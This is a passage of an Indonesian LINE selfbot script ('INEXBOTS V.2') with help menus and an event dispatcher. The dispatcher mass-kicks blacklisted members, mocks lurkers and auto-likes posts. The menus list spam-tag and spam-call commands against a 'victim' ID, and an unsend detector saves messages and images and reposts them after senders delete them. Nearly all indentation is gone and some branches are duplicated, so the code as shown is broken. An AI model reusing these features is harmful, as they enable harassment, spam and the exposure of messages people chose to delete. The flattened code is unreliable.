"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"flex": 2,
"contents": [{
"type": "button",
"style": "secondary",
"color": "#00FF00",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(to, data)
def command(text):
pesan = text.lower()
if pesan.startswith(Setmain["keyCommand"]):
cmd = pesan.replace(Setmain["keyCommand"],"")
else:
cmd = "command"
return cmd
def help():
key = Setmain["keyCommand"]
key = key.title()
helpMessage = extras + "╔━━═☠• INEXBOTS •☠═━━╗\n" + \
"╠☠•➤" + key + "☠•➤MENU HELP•☠\n" + \
"╠☠•➤" + key + "Me\n" + \
"╠☠•➤" + key + "Tokenlist\n" + \
"╠☠•➤" + key + "Memberpict\n" + \
"╠☠•➤" + key + "Mid「@」\n" + \
"╠☠•➤" + key + "Getmid「@」\n" + \
"╠☠•➤" + key + "Info「@」\n" + \
"╠☠•➤" + key + "Kick「@」\n" + \
"╠☠•➤" + key + "Kibar\n" + \
"╠☠•➤" + key + "Status\n" + \
"╠☠•➤" + key + "About\n" + \
"╠☠•➤" + key + "Restart\n" + \
"╠☠•➤" + key + "Runtime\n" + \
"╠☠•➤" + key + "Creator\n" + \
"╠☠•➤" + key + "Speed/Sp\n" + \
"╠☠•➤" + key + "Sprespon\n" + \
"╠☠•➤" + key + "Tag/Inex\n" + \
"╠☠•➤" + key + "Tag room:「No grup」\n" + \
"╠☠•➤" + key + "Ginfo\n" + \
"╠☠•➤" + key + "Open\n" + \
"╠☠•➤" + key + "Close\n" + \
"╠☠•➤" + key + "Gurl\n" + \
"╠☠•➤" + key + "Gruplist\n" + \
"╠☠•➤" + key + "Infogrup「angka」\n" + \
"╠☠•➤" + key + "Infomem「angka」\n" + \
"╠☠•➤" + key + "Remove chat\n" + \
"╠☠•➤" + key + "Lurking「on/off」\n" + \
"╠☠•➤" + key + "Lurkers\n" + \
"╠☠•➤" + key + "Sider「on/off」\n" + \
"╠☠•➤" + key + "Myup\n" + \
"╠☠•➤" + key + "Updategrup\n" + \
"╠☠•➤" + key + "Bcast: / Gcast:「Text」\n" + \
"╠☠•➤" + key + "Pmcast:「Text」\n" + \
"╠☠•➤" + key + "Setkey「New Key」\n" + \
"╠☠•➤" + key + "Mykey\n" + \
"╠☠•➤" + key + "Resetkey\n" + \
"╠☠•➤" + key + "☠•HIBURAN•☠\n" + \
"╠☠•➤" + key + "Movie\n" + \
"╠☠•➤" + key + "ID line:「Id Line nya」\n" + \
"╠☠•➤" + key + "Sholat:「Nama Kota」\n" + \
"╠☠•➤" + key + "Cuaca:「Nama Kota」\n" + \
"╠☠•➤" + key + "Lokasi:「Nama Kota」\n" + \
"╠☠•➤" + key + "Musik「Judul Lagu」\n" + \
"╠☠•➤" + key + "Lirik:「Judul Lagu」\n" + \
"╠☠•➤" + key + "Ytmp3:「Judul Lagu」\n" + \
"╠☠•➤" + key + "Ytmp「Judul Video」\n" + \
"╠☠•➤" + key + "Profileig:「Nama IG」\n" + \
"╠☠•➤" + key + "Cekdate:「tgl-bln-thn」\n" + \
"╠☠•➤" + key + "Jumlah:「angka」\n" + \
"╠☠•➤" + key + "Spamtag「@」\n" + \
"╠☠•➤" + key + "Spamcall:「jumlahnya」\n" + \
"╠☠•➤" + key + "Spamcall\n" + \
"╠☠•➤" + key + "Notag「on/off」\n" + \
"╚━━═☠•INEXBOTS V.2•☠═━━╝"
return helpMessage
def helpa():
key = Setmain["keyCommand"]
key = key.title()
helpMessagea = extras + "╔━━═☠• INEXBOTS •☠═━━╗\n" + \
"╠☠•➤" + key + "☠•ARESPONSE•☠\n" + \
"╠☠•➤" + key + "Sticker「on/off」\n" + \
"╠☠•➤" + key + "R1「on/off」\n" + \
"╠☠•➤" + key + "R2「on/off」\n" + \
"╠☠•➤" + key + "PM「on/off」\n" + \
"╠☠•➤" + key + "Contact「on/off」\n" + \
"╠☠•➤" + key + "Autojoin「on/off」\n" + \
"╠☠•➤" + key + "Autoadd「on/off」\n" + \
"╠☠•➤" + key + "Autoblock「on/off」\n" + \
"╠☠•➤" + key + "Wc「on/off」\n" + \
"╠☠•➤" + key + "Autoleave「on/off」\n" + \
"╠☠•➤" + key + "Admin:on\n" + \
"╠☠•➤" + key + "Admin:repeat\n" + \
"╠☠•➤" + key + "Staff:on\n" + \
"╠☠•➤" + key + "Staff:repeat\n" + \
"╠☠•➤" + key + "Bot:on\n" + \
"╠☠•➤" + key + "Bot:repeat\n" + \
"╠☠•➤" + key + "Adminadd「@」\n" + \
"╠☠•➤" + key + "Admindell「@」\n" + \
"╠☠•➤" + key + "Staffadd「@」\n" + \
"╠☠•➤" + key + "Staffdell「@」\n" + \
"╠☠•➤" + key + "Botadd「@」\n" + \
"╠☠•➤" + key + "Botdell「@」\n" + \
"╠☠•➤" + key + "Listadmin\n" + \
"╚━━═☠•INEXBOTS V.2•☠═━━╝"
return helpMessagea
def helpbot():
key = Setmain["keyCommand"]
key = key.title()
helpMessage1 = extras + "╔━━━═☠•☠• INEXBOTS •☠•☠═━━━╗\n" + \
"╠☠•➤" + key + "☠•HELP BOT•☠\n" + \
"╠☠•➤" + key + "Blc\n" + \
"╠☠•➤" + key + "Ban:on\n" + \
"╠☠•➤" + key + "Unban:on\n" + \
"╠☠•➤" + key + "Ban「@」\n" + \
"╠☠•➤" + key + "Unban「@」\n" + \
"╠☠•➤" + key + "Talkban「@」\n" + \
"╠☠•➤" + key + "Untalkban「@」\n" + \
"╠☠•➤" + key + "Talkban:on\n" + \
"╠☠•➤" + key + "Untalkban:on\n" + \
"╠☠•➤" + key + "Banlist\n" + \
"╠☠•➤" + key + "Talkbanlist\n" + \
"╠☠•➤" + key + "Clearban\n" + \
"╠☠•➤" + key + "Refresh\n" + \
"╠☠•➤" + key + "Cek allrespon\n" + \
"╠☠•➤" + key + "Cek sider\n" + \
"╠☠•➤" + key + "Cek spam\n" + \
"╠☠•➤" + key + "Cek pesan \n" + \
"╠☠•➤" + key + "Cek respon \n" + \
"╠☠•➤" + key + "Cek welcome\n" + \
"╠☠•➤" + key + "Set sider:「Text」\n" + \
"╠☠•➤" + key + "Set spam:「Text」\n" + \
"╠☠•➤" + key + "Set pesan:「Text」\n" + \
"╠☠•➤" + key + "Set r1:「Text」\n" + \
"╠☠•➤" + key + "Set r2:「Text」\n" + \
"╠☠•➤" + key + "Set pm:「Text」\n" + \
"╠☠•➤" + key + "Set Autojoin:「Text」\n" + \
"╠☠•➤" + key + "Set welcome:「Text」\n" + \
"╠☠•➤" + key + "Myname:「Nama」\n" + \
"╠☠•➤" + key + "Gift:「Mid korban」「Jumlah」\n" + \
"╠☠•➤" + key + "Spam:「Mid korban」「Jumlah」\n" + \
"╚━━━━═☠•☠•INEXBOTS V.2•☠•☠═━━━━╝"
return helpMessage1
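# Main operation dispatcher. bot(op) receives every Operation from the polling
# loop and branches on op.type; the numeric codes below are used the way this
# wrapper appears to define them (inferred from each branch): 13 = group
# invite, 17 = member joined, 15 = member left, 19 = member kicked,
# 25/26 = message sent/received, 55 = chat read, 65 = message unsent,
# 5 = added as friend.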
def bot(op):
global time
global ast
global groupParam
try:
if op.type == 0:
return
if op.type == 13:
if mid in op.param3:
if wait["autoLeave"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
sendAutolike(op.param1,"Maaf fams "+str(ginfo.name)+" saya pamit lagi ya.")
cl.leaveGroup(op.param1)
else:
cl.acceptGroupInvitation(op.param1)
ginfo = cl.getGroup(op.param1)
cl.sendMessage(op.param1,"Hi fams "+str(ginfo.name))
if op.type == 13:
if mid in op.param3:
if wait["autoJoin"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.acceptGroupInvitation(op.param1)
group = cl.getGroup(op.param1)
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "Masuk group melalui jendela",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": str(wait["autoJoinMessage"]),
"size": "md",
"weight": "bold",
"wrap": True,
"color": warnanya1,
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00FFFF"
},
"header": {
"backgroundColor": "#00FFFF"
}
},
"hero": {
"type": "image",
"aspectRatio": "20:13",
"aspectMode": "cover",
"url": "https://obs.line-scdn.net/{}".format(group.pictureStatus),
"size": "full",
"margin": "xl"
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [{
"type": "box",
"layout": "horizontal",
"contents": [{
"type": "button",
"flex": 2,
"style": "primary",
"color": "#006400",
"height": "sm",
"action": {
"type": "uri",
"label": "OFFICIAL",
"uri": "https://line.me/R/ti/p/%40bvb1195k"
}
}, {
"flex": 3,
"type": "button",
"style": "primary",
"color": "#800000",
"margin": "sm",
"height": "sm",
"action": {
"type": "uri",
"label": "CREATOR",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}]
}]
}
}
}
cl.sendFlex(op.param1, data)
# EDIT
if op.type == 19:
if op.param3 in admin or op.param3 in owner or op.param3 in staff:
if op.param2 in admin or op.param2 in owner or op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
cl.kickoutFromGroup(op.param1,[op.param2])
except:
cl.log("bot limit")
if op.type == 17:
if op.param2 in wait["blacklist"]:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.reissueGroupTicket(op.param1)
X = cl.getGroup(op.param1)
X.preventedJoinByTicket = True
cl.updateGroup(X)
wait["blacklist"][op.param2] = True
except:
pass
return
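    # Second op.type 17 branch: welcome flex for groups registered in
    # `welcome`, built from the joiner's display name and profile picture.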
if op.type == 17:
if op.param1 in welcome:
ginfo = cl.getGroup(op.param1)
#welcomeMembers(op.param1, [op.param2])
contact = cl.getContact(op.param2)
data = {
"type": "flex",
"altText": "JANGAN KABUR DARI GRUP KAK",
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#000080",
},
"body": {
"backgroundColor": "#0000FF",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{} WELCOME".format(cl.getContact(op.param2).displayName),
"weight": "bold",
"color": "#FF0000",
"size": "xxl"
}
]
},
"hero": {
"type": "image",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": str(wait["welcome"]),
"wrap": True,
"color": "#00FF00",
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": "#00FF00",
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(op.param1, data)
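    # op.type 15 (member left): goodbye flex for groups with welcome enabled.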
if op.type == 15:
if op.param1 in welcome:
ginfo = cl.getGroup(op.param1)
leaveMembers(op.param1, [op.param2])
contact = cl.getContact(op.param2).picturePath
data = {
"type": "flex",
"altText": "kickall",
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#000080",
},
"body": {
"backgroundColor": "#0000FF",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{} LEAVE".format(cl.getContact(op.param2).displayName),
"weight": "bold",
"color": "#FF0000",
"size": "xxl"
}
]
},
"hero": {
"type": "image",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(op.param2).pictureStatus),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "Selamat jalan,,, semoga d luar gak kdinginan",
"wrap": True,
"color": "#00FF00",
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": "#00FF00",
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(op.param1, data)
if op.type == 13:
if op.param2 in wait["blacklist"]:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.cancelGroupInvitation(op.param1,[op.param2])
except:
pass
if op.type == 5:
if wait["autoAdd"] == True:
if op.param2 not in Bots and op.param2 not in owner and op.param2 not in admin and op.param2 not in staff:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [" "," ","\n",None]):
pass
else:
cl.sendMessage(op.param1, wait["message"])
#☠•➤☠•➤☠•➤RKF☠•➤☠•➤☠•➤☠•➤
if admin in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param1,admin)
cl.inviteIntoGroup(op.param1,admin)
wait["blacklist"][op.param2] = True
except:
pass
return
if staff in op.param3:
if op.param2 in Bots:
pass
if op.param2 in owner:
pass
if op.param2 in admin:
pass
if op.param2 in staff:
pass
else:
wait["blacklist"][op.param2] = True
try:
cl.kickoutFromGroup(op.param1,[op.param2])
cl.findAndAddContactsByMid(op.param1,staff)
cl.inviteIntoGroup(op.param1,staff)
wait["blacklist"][op.param2] = True
except:
pass
return
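    # op.type 25/26: when a shared Timeline post (contentType 16) arrives and
    # wait["Timeline"] is on, summarise the post details, then like it and
    # leave the configured comment.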
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 2:
if msg.toType == 0:
to = msg._from
elif msg.toType == 2:
to = msg.to
if msg.contentType == 16:
if wait["Timeline"] == True:
ret_ = "☠•➤ Detail Postingan☠•➤"
if msg.contentMetadata["serviceType"] == "GB":
contact = cl.getContact(sender)
auth = "\n☠•➤ Penulis : {}".format(str(contact.displayName))
else:
auth = "\n☠•➤ Penulis : {}".format(str(msg.contentMetadata["serviceName"]))
ret_ += auth
if "stickerId" in msg.contentMetadata:
stck = "\n☠•➤ Stiker : https://line.me/R/shop/detail/{}".format(str(msg.contentMetadata["packageId"]))
ret_ += stck
if "mediaOid" in msg.contentMetadata:
object_ = msg.contentMetadata["mediaOid"].replace("svc=myhome|sid=h|","")
if msg.contentMetadata["mediaType"] == "V":
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n☠•➤ Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
murl = "\n☠•➤ Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n☠•➤ Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
murl = "\n☠•➤ Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(object_))
ret_ += murl
else:
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n☠•➤ Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n☠•➤ Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
ret_ += ourl
if "text" in msg.contentMetadata:
text = "\n☠•➤ Tulisan : {}".format(str(msg.contentMetadata["text"]))
purl = "\n☠•➤ Post URL : {}".format(str(msg.contentMetadata["postEndUrl"]).replace("line://","https://line.me/R/"))
ret_ += purl
ret_ += text
sendTextTemplate1(to, str(ret_))
            url = msg.contentMetadata["postEndUrl"]
            cl.likePost(url[25:58], url[66:], likeType=1001)
            cl.createComment(url[25:58], url[66:], wait["comment"])
sendAutolike(to, "Like done")
if op.type == 55:
try:
if op.param1 in Setmain["ARreadPoint"]:
if op.param2 in Setmain["ARreadMember"][op.param1]:
pass
else:
Setmain["ARreadMember"][op.param1][op.param2] = True
else:
pass
except:
pass
if op.type == 55:
try:
if cctv['cyduk'][op.param1]==True:
if op.param1 in cctv['point']:
if op.param2 in Bots:
pass
else:
Name = cl.getContact(op.param2).displayName
Np = cl.getContact(op.param2).pictureStatus
if Name in cctv['sidermem'][op.param1]:
pass
else:
cctv['sidermem'][op.param1] += "\n• " + Name
if " " in Name:
nick = Name.split(' ')
if len(nick) == 2:
sendCyduk(op.param1, wait["mention"])
else:
sendTextTemplate44(op.param1, "Woy " + nick[1] + "\nBetah Banget Jadi Cicitipi. . \nChat Woy (-__-) ")
else:
sendTextTemplate7(op.param1, "Nah.. " + "☞ " + Name + " ☜" + "\nNgapain Cicitipi Doang?\nGa Gaul Lu ga Mau Chat\nPasti Temennya Dikit ")
else:
pass
else:
pass
except:
pass
if op.type == 55:
if op.param2 in wait["blacklist"]:
random.choice(ABC).kickoutFromGroup(op.param1,[op.param2])
else:
pass
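    # Second op.type 5 branch (added by a new contact): with autoBlock on,
    # send a notice, block the contact and blacklist them.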
if op.type == 5:
if settings['autoBlock'] == True:
try:
usr = cl.getContact(op.param2)
cl.sendMessage(op.param1, "Haii {} Sorry Auto Block , Komen di TL dulu ya kalo akun asli baru di unblock".format(usr.displayName))
cl.talk.blockContact(0, op.param1)
wait["Blacklist"][op.param2] = True
except Exception as e:
print (e)
if op.type == 26:
if wait["selfbot"] == True:
msg = op.message
if msg._from not in Bots:
if wait["talkban"] == True:
if msg._from in wait["Talkblacklist"]:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
except:
random.choice(ABC).kickoutFromGroup(msg.to, [msg._from])
          if 'MENTION' in msg.contentMetadata:
if wait["arespon"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
lists = []
for mention in mentionees:
if mention ['M'] in Bots:
contact = cl.getContact(msg._from)
sendMentionV3(sender, "Kak @! "+ wait["Responpm"], [sender])
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "{} Cieeeee... Kang tag".format(cl.getContact(sender).displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{}".format(cl.getContact(sender).displayName),
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://obs.line-scdn.net/{}".format(cl.getContact(sender).pictureStatus),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "{} \n".format(cl.getContact(sender).displayName)+str(wait["Responpm"]),
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(sender, data)
break
          if 'MENTION' in msg.contentMetadata:
if wait["detectMention"] == True:
contact = cl.getContact(msg._from)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "template",
"altText": "Mention plates",
"template": {
"type": "carousel",
"actions": [],
"columns": [
{
"thumbnailImageUrl": "https://obs.line-scdn.net/{}".format(cl.getContact(msg._from).pictureStatus),
"title": "{}".format(cl.getContact(msg._from).displayName),
"text": str(wait["Respontag"]),
"actions": [
{
"type": "uri",
"label": "CREATOR",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
]
},
{
"thumbnailImageUrl": "https://scontent.fcgk8-1.fna.fbcdn.net/v/t1.0-9/fr/cp0/e15/q65/51689146_2326064860750957_3568131342002552832_o.jpg?_nc_cat=100&efg=eyJpIjoiYiJ9&_nc_eui2=AeEKUakDYnXikuMkE8vPPZhxEuKQRqPyo08BbWoruGL-DN9mYH2NmCnik886MGJCiMS8D7ZSUmabSAcRk7S3_GwwhAIKCVBmiq32OaYa0XaV-w&_nc_ht=scontent.fcgk8-1.fna&oh=18937dc8439c5fdf7c9de33c6f00fad6&oe=5D0231F5",
"title": "ɪɴᴇxʙᴏᴛs",
"text": "☠•➤ ɪɴᴇxʙᴏᴛs.ʙᴏᴛʟɪɴᴇ \nᴠᴇʀ.8.14.2 ᴘʀᴏᴛᴇᴄᴛ",
"actions": [
{
"type": "uri",
"label": "ORDER",
"uri": "line://app/1602687308-GXq4Vvk9/?type=text&text=price"
}
]
}
]
}
}
cl.sendFlex(to, data)
break
          if 'MENTION' in msg.contentMetadata:
if wait["detectMention2"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
saints = cl.getContact(msg._from)
url = "https://game.linefriends.com/jbp-lcs-ranking/lcs/sendMessage"
cl.sendMessage(msg.to, wait["Respontag2"])
#cl.sendMessage(to, None, contentMetadata={"STKID":"50726910","STKPKGID":"11475","STKVER":"2"}, contentType=7)
data = {
"type": "template",
"altText": "{} sent a sticker".format(cl.getProfile().displayName),
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": "https://3.bp.blogspot.com/-5wFNSCJlYWI/WRxHdiXJl0I/AAAAAAAHlIg/k9KvZJCkpfIslWlgqyxtjR5jzBEvEgA6QCLcB/s1600/AW429388_04.gif",
"size": "full",
"action": {
"type": "uri",
"uri": "https://line.me/S/sticker/12555"
}
}
]
}
}
cl.sendFlex(to, data)
break
          if 'MENTION' in msg.contentMetadata:
if wait["Mentionkick"] == True:
name = re.findall(r'@(\w+)', msg.text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
if mention ['M'] in Bots:
cl.mentiontag(msg.to,[msg._from])
cl.sendMessage(msg.to, "Jangan tag saya....")
cl.kickoutFromGroup(msg.to, [msg._from])
break
#===========================
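    # Message cache for the unsend detector: plain text and downloaded images
    # go into msg_dict, sticker details into msg_dict1, keyed by message id.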
    if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.contentType == 0:
msg_dict[msg.id] = {"text":msg.text,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 1:
path = cl.downloadObjectMsg(msg_id)
msg_dict[msg.id] = {"text":'Gambarnya dibawah',"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 7:
stk_id = msg.contentMetadata["STKID"]
stk_ver = msg.contentMetadata["STKVER"]
pkg_id = msg.contentMetadata["STKPKGID"]
ret_ = "╭━━━━══════════════\n"
ret_ = "\n┣☠•➤「 Sticker Info 」"
ret_ += "\n┣☠•➤ Sticker ID : {}".format(stk_id)
ret_ += "\n┣☠•➤ Sticker Version : {}".format(stk_ver)
ret_ += "\n┣☠•➤ Sticker Package : {}".format(pkg_id)
ret_ += "\n┣☠•➤ Sticker Url : line://shop/detail/{}".format(pkg_id)
ret_ += "\n╰━━━━══════════════\n"
query = int(stk_id)
if type(query) == int:
data = 'https://stickershop.line-scdn.net/stickershop/v1/sticker/'+str(query)+'/ANDROID/sticker.png'
path = cl.downloadFileURL(data)
msg_dict1[msg.id] = {"text":str(ret_),"data":path,"from":msg._from,"createdTime":msg.createdTime}
if msg.contentType == 0:
if text is None:
return
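    # op.type 65 (unsend): repost whatever was cached for the deleted message
    # together with the sender, group name and original send time.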
if op.type == 65:
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict:
if msg_dict[msg_id]["from"]:
if msg_dict[msg_id]["text"] == 'Gambarnya dibawah':
ginfo = cl.getGroup(at)
jaka = cl.getContact(msg_dict[msg_id]["from"])
zx = ""
zxc = ""
zx2 = []
xpesan = "╭━━━━══════════════\n┣☠•➤「 Gambar Dihapus 」\n┣☠•➤ Pengirim"
ret_ = "\n┣☠•➤ Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n┣☠•➤ Waktu Dikirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ret_ += "\n╰━━━━══════════════"
ry = str(jaka.displayName)
pesan = ''
pesan2 = pesan+"{} \n".format(str(jaka.displayName))
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':jaka.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
sendTextTemplate3(at, text)
cl.sendImage(at, msg_dict[msg_id]["data"])
else:
ginfo = cl.getGroup(at)
jaka = cl.getContact(msg_dict[msg_id]["from"])
ret_ = "╭━━━━══════════════"
ret_ += "\n┣☠•➤ Pesan Dihapus"
ret_ += "\n┣☠•➤ Pengirim : {}".format(str(jaka.displayName))
ret_ += "\n┣☠•➤ Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n┣☠•➤ Waktu Dikirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ret_ += "\n┣☠•➤ Pesannya : {}".format(str(msg_dict[msg_id]["text"]))
ret_ += "\n╰━━━━══════════════"
sendTextTemplate3(at, str(ret_))
del msg_dict[msg_id]
except Exception as e:
print(e)
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict1:
if msg_dict1[msg_id]["from"]:
ginfo = cl.getGroup(at)
jaka = cl.getContact(msg_dict1[msg_id]["from"])
ret_ = "「 Sticker Dihapus 」\n"
ret_ = "╭━━━━══════════════"
ret_ += "\n┣☠•➤ Pengirim : {}".format(str(jaka.displayName))
ret_ += "\n┣☠•➤ Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n┣☠•➤ Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict1[msg_id]["createdTime"])))
ret_ += "\n┣☠•➤ {}".format(str(msg_dict1[msg_id]["text"]))
ret_ += "\n╰━━━━══════════════"
sendTextTemplate3(at, str(ret_))
cl.sendImage(at, msg_dict1[msg_id]["data"])
del msg_dict1[msg_id]
except Exception as e:
print(e)
#===============
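    # Command dispatcher: command(text) strips the configured key prefix
    # (Setmain["keyCommand"]) from the message, and several commands can be
    # chained in a single message separated by " & ". Most branches below are
    # additionally gated on the owner/admin/staff lists.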
if op.type == 26:
try:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
terminal = command(text)
for terminal in terminal.split(" & "):
setKey = settings["keyCommand"].title()
if settings["setKey"] == False:
setKey = ''
if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:
if msg.toType == 0:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
elif msg.toType == 1:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 0:
if to in offbot:
return
elif msg.contentType == 16:
if settings["checkPost"] == True:
try:
ret_ = "☠•Details Post•☠"
if msg.contentMetadata["serviceType"] == "GB":
contact = cl.getContact(sender)
auth = "\n☠•➤Penulis•➤•➤ : {}".format(str(contact.displayName))
else:
auth = "\n☠•➤Penulis•➤•➤ : {}".format(str(msg.contentMetadata["serviceName"]))
purl = "\n☠URL☠•➤ : {}".format(str(msg.contentMetadata["postEndUrl"]).replace("line://","https://line.me/R/"))
ret_ += auth
ret_ += purl
if "mediaOid" in msg.contentMetadata:
object_ = msg.contentMetadata["mediaOid"].replace("svc=myhome|sid=h|","")
if msg.contentMetadata["mediaType"] == "V":
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n☠•Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
